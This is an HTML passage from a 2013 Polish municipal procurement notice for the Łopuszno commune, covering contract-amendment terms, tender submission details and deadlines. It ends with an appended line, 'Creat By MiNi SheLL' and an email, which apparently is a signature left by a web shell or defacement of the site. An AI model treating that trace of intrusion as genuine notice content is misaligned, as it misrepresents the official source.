a) Zmiana terminów płatności wynikające z wszelkich zmian wprowadzonych do umowy o ile nie spowodują konieczności zapłaty odsetek lub wynagrodzenia w większej kwocie wykonawcy.
b) Wystąpienia urzędowej zmiany stawki VAT.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.lopuszno.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Łopuszno, ul. Konecka 12, 26-070 Łopuszno - pokój Nr 1.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 18.06.2013 godzina 10:00, miejsce: Urząd Gminy Łopuszno, ul. Konecka 12, 26-070 Łopuszno, sekretariat - pokój Nr 5.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com